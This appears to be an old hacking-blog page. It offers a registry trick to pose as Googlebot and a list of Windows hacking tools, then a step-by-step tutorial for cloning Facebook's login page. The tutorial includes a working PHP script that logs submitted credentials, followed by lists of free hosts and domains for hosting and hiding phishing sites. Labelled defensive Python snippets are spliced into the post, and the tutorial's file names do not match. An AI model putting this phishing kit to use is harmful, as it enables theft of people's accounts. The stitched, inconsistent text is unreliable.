[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Googlebot/2.1"
"Compatible"="+http://www.googlebot.com/bot.html"

Now double-click the file Useragent.reg to merge it into your Windows Registry.
Now restart your computer. This is required to apply the changes made to the Registry.
Voila! You’re done! Now you have become GoogleBot.
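Seen from the server side, the trick above is the reason a User-Agent string alone cannot identify a crawler. The following is an added example, not part of the original post: a forward-confirmed reverse DNS check a site can run before trusting a request that claims to be Googlebot. The function names, the sample User-Agent string and the DNS data are constructed for illustration, and the resolvers are injectable so the demo runs offline.

```python
import socket

# Reverse-DNS suffixes Google documents for Googlebot hosts.
CRAWLER_SUFFIXES = (".googlebot.com", ".google.com")

def system_reverse(ip):
    """PTR lookup; None when the address has no reverse record."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except OSError:
        return None

def system_forward(host):
    """A-record lookup; empty set when the name does not resolve."""
    try:
        return set(socket.gethostbyname_ex(host)[2])
    except OSError:
        return set()

def classify(ip, user_agent, reverse=system_reverse, forward=system_forward):
    """Return 'visitor', 'verified-crawler' or 'spoofed-crawler'."""
    if "googlebot" not in user_agent.lower():
        return "visitor"
    host = (reverse(ip) or "").rstrip(".").lower()
    if not host.endswith(CRAWLER_SUFFIXES):
        return "spoofed-crawler"
    # The owner of an IP block controls its PTR record, so the name must
    # also resolve back to the same address before it is trusted.
    if ip not in forward(host):
        return "spoofed-crawler"
    return "verified-crawler"

# Constructed DNS data using documentation address ranges (not real crawler IPs).
PTR = {
    "192.0.2.10": "crawl-192-0-2-10.googlebot.com",
    "198.51.100.7": "host7.isp.example",
    "203.0.113.5": "crawl-1.googlebot.com",  # forged PTR, no matching A record
}
A = {"crawl-192-0-2-10.googlebot.com": {"192.0.2.10"}}
SPOOFED_UA = "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"  # constructed

def demo():
    """Classify each constructed client against the constructed DNS data."""
    fwd = lambda host: A.get(host, set())
    return {ip: classify(ip, SPOOFED_UA, PTR.get, fwd) for ip in PTR}
```

Content that is only meant for logged-in users should be gated by authentication on the server, with this check used only to decide whether a request gets crawler treatment.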

Top 10 Windows Hacking Tools


This is the Collection of Best Windows Hacking Tools:

1. Cain & Abel – Cain & Abel is a password recovery tool for the Microsoft Windows Operating System. It allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

2. SuperScan – SuperScan is a powerful TCP port scanner, pinger, resolver. SuperScan 4 (Current Version) is a completely-rewritten update of the highly popular Windows port scanning tool, SuperScan.

3. GFI LANguard Network Security Scanner – GFI LANguard N.S.S. is a network vulnerability management solution that scans your network and performs over 15,000 vulnerability assessments. It identifies all possible security threats and provides you with tools to patch and secure your network. GFI LANguard N.S.S. was voted Favorite Commercial Security Tool by NMAP users for 2 years running and has been sold over 200,000 times!

4. Retina – Retina Network Security Scanner, recognised as the industry standard for vulnerability assessment, identifies known security vulnerabilities and assists in prioritising threats for remediation. Featuring fast, accurate, and non-intrusive scanning, users are able to secure their networks against even the most recent of discovered vulnerabilities.

5. SamSpade – SamSpade provides a consistent GUI and implementation for many handy network query tasks. It was designed with tracking down spammers in mind, but can be useful for many other network exploration, administration, and security tasks. It includes tools such as ping, nslookup, whois, dig, traceroute, finger, raw HTTP web browser, DNS zone transfer, SMTP relay check, website search, and more.

6. N-Stealth – N-Stealth is a commercial web server security scanner. It is generally updated more frequently than free web scanners such as whisker and nikto, but you have to pay for the privilege.

7. Solarwinds – Solarwinds contains many network monitoring, discovery and attack tools. The advanced security tools not only test internet security with the SNMP Brute Force Attack and Dictionary Attack utilities but also validate the security on Cisco Routers with the Router Security Check. The Remote TCP Reset remotely displays all active sessions on a device and the Password Decryption can decrypt Type 7 Cisco Passwords. The Port Scanner allows testing for open TCP ports across IP Address and port ranges or selection of specific machines and ports.

8. Achilles – The first publicly released general-purpose web application security assessment tool. Achilles acts as an HTTP/HTTPS proxy that allows a user to intercept, log, and modify web traffic on the fly. Due to a cyber squatter, Achilles is no longer online at its original home of www.Digizen-Security.com…OOPS!

9. CookieDigger – CookieDigger helps identify weak cookie generation and insecure implementations of session management by web applications. The tool works by collecting and analyzing cookies issued by a web application for multiple users. The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, is included in the cookie values.

10. Netcat (The Network SwissArmy Knife) – Netcat was originally a Unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

Hacking Facebook account with Phishing !!!!




This is the easiest and most commonly used way of hacking a Facebook account.

Step1: Goto www.facebook.com/login.php
Step2 : Save the file to your desktop with photos with name login.php
Step3 : Open the html file with notepad.
Step4 : Now search for form method="POST" and replace it with form method="GET"
Step5 : And next is replacing action="https://login.facebook.com/login.php?login_attempt=1" with action="lol.php"
Step6 : now open a notepad and type following as it is.




<?php
header ('Location: http://www.facebook.com');
$handle = fopen("lol.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>





NOW save this as hello.php

Step7 : now make a account on t35.com and Upload


Login.html
hello.php
lol.txt
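For a hosting provider's abuse team or a site owner checking their own web root, the kit described above leaves recognisable static traits. The following is an added example, not part of the original post: a triage pass that flags PHP files combining an off-site redirect, a loop over every submitted field and an append-mode file write, and HTML pages whose password form submits by GET. All file names, domains and sample contents are constructed placeholders.

```python
import re
from html.parser import HTMLParser

# Any one trait alone is common in benign code; the combination is what gets flagged.
PHP_SIGNALS = {
    "offsite_redirect": re.compile(r"header\s*\(\s*['\"]Location:\s*https?://", re.I),
    "dumps_all_fields": re.compile(r"foreach\s*\(\s*\$_(?:POST|GET|REQUEST)\b", re.I),
    "appends_to_file": re.compile(
        r"fopen\s*\([^)]*,\s*['\"]a[+b]*['\"]|file_put_contents\s*\([^)]*FILE_APPEND", re.I),
}

def php_signals(source):
    """Names of the harvester traits found in one PHP source file."""
    return sorted(name for name, rx in PHP_SIGNALS.items() if rx.search(source))

class _FormScan(HTMLParser):  # records [method, action, has_password_field] per form
    def __init__(self):
        super().__init__()
        self.forms = []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append([(a.get("method") or "get").lower(), a.get("action") or "", False])
        elif tag == "input" and self.forms and (a.get("type") or "").lower() == "password":
            self.forms[-1][2] = True

def password_over_get(html):
    """Actions of forms that would put a password in the URL (method GET)."""
    scan = _FormScan()
    scan.feed(html)
    return [action for method, action, has_pw in scan.forms if has_pw and method == "get"]

def triage(upload):
    """upload: {filename: text}. Returns the files worth an abuse analyst's review."""
    flagged = {}
    for name, text in upload.items():
        if name.endswith(".php") and len(php_signals(text)) == 3:
            flagged[name] = "harvester-pattern"
        elif name.endswith((".html", ".htm")) and password_over_get(text):
            flagged[name] = "password-form-uses-get"
    return flagged

# Constructed upload (placeholder names and domains), not taken from a real kit.
UPLOAD = {
    "collect.php": r'''<?php header('Location: https://brand.example/'); $h = fopen("out.txt", "a");
foreach ($_POST as $k => $v) { fwrite($h, "$k=$v\n"); } fclose($h);''',
    "contact.php": r'''<?php mail("o@site.example", "Hi", $_POST["msg"]); header('Location: /thanks.html');''',
    "index.html": '<form method="GET" action="collect.php"><input name="email"><input type="password" name="pass"></form>',
}
```

A hit is a prompt for human review, not proof: the patterns are heuristics and a trivially reworded script will not match them.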

A Large List of Free PHP Hosting for Phishing.


* 110mb - http://110mb.com/

* Ripway - http://ripway.com/

* SuperFreeHost - http://superfreehost.info/

* Freehostia - http://freehostia.com/

* Funpic - http://funpic.de/

* Freeweb7 - http://freeweb7.com/

* t35 - http://t35.com/

* Awardspace - http://awardspace.com/

* PHPNet - http://phpnet.us/

* Free Web Hosting Pro - http://freewebhostingpro.com/

* ProHosts - http://prohosts.org/

* AtSpace - http://prohosts.org/

* ByetHost - http://byethost.com/

* 000webhost - http://000webhost.com/

* My5GB - http://www.my5gb.com/

* Oxyhost - http://www.oxyhost.com/

* Rack111 - http://www.rack111.com/

* Ocostwebhost - http://0costwebhost.com/

* FreeZoka - http://www.freezoka.com/

Free Domain List for Hiding your Phishing Site.


* .TK - www.dot.tk

* .CJB.NET - www.cjb.net

* .DOM.IR - www.dom.ir

* .EURO.ST & MANY MORE - www.ulimit.com

* .CO.CC - www.co.cc

* .CO.NR - www.freedomain.co.nr

* .US.TT & MANY MORE - www.joynic.com

* .UNI.CC - www.uni.cc

* .CA.GS - www.ca.gs